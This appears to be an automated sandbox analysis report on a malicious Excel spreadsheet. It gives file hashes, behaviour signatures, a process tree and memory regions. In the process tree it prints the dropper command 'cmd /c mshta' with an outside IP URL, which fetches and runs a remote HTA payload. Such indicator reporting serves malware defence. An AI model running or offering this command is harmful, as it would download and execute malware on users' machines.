Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 09:59

General

  • Target

    76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e.xls

  • Size

    76KB

  • MD5

    8cc7297dda5f22780b22d5fa643b0da3

  • SHA1

    a3aa519607c9bddbdde3ed525d880172df11f43c

  • SHA256

    76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e

  • SHA512

    eb8c8cddcddea9e1f2cb70863ebfff2a23676a9bdc08440420cf1380dbbdb85625cac0e8fafd2e8f18f83e3c0d4867faf0925222e28583f47f83c887a9fb6361

  • SSDEEP

    1536:1I+Hymsbck3hbdlylKsgqopeJBWhZFGkE+cMLxAAISQ5gQ72IotO6nitSU6U+x:1I+HymsYk3hbdlylKsgqopeJBWhZFGkz

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/zzx/ccv/fe.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\76cb28484132dc02ed1731f85cc45210303742a011e43fa47fdc66165badcd6e.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/zzx/ccv/fe.html
        3⤵
        • Blocklisted process makes network request
        PID:4908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    1KB

    MD5

    f0467a5ebf495e5af70043648c6ab5af

    SHA1

    44a19e7e8203cf3281a6471c347b09e62a52f1dc

    SHA256

    89cd6f2fa742ca6e1c5cc127375810597b5462f911cdf4229df8322562d00227

    SHA512

    6a32413608ade100195a81e9fa2289f44b55358164baf924ea3d73425791de8d4f895cd24adf2b22fadf09c03c3415b0acbf2da3be096470bdfdf918e07310bd

  • memory/4152-16-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-35-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-4-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-3-0x00007FFF38010000-0x00007FFF38020000-memory.dmp

    Filesize

    64KB

  • memory/4152-7-0x00007FFF38010000-0x00007FFF38020000-memory.dmp

    Filesize

    64KB

  • memory/4152-10-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-11-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-12-0x00007FFF35920000-0x00007FFF35930000-memory.dmp

    Filesize

    64KB

  • memory/4152-9-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-8-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-6-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-17-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-2-0x00007FFF38010000-0x00007FFF38020000-memory.dmp

    Filesize

    64KB

  • memory/4152-5-0x00007FFF38010000-0x00007FFF38020000-memory.dmp

    Filesize

    64KB

  • memory/4152-13-0x00007FFF35920000-0x00007FFF35930000-memory.dmp

    Filesize

    64KB

  • memory/4152-18-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-15-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-14-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-21-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-22-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-20-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-19-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-33-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-34-0x00007FFF7802D000-0x00007FFF7802E000-memory.dmp

    Filesize

    4KB

  • memory/4152-0-0x00007FFF38010000-0x00007FFF38020000-memory.dmp

    Filesize

    64KB

  • memory/4152-39-0x00007FFF77F90000-0x00007FFF78185000-memory.dmp

    Filesize

    2.0MB

  • memory/4152-1-0x00007FFF7802D000-0x00007FFF7802E000-memory.dmp

    Filesize

    4KB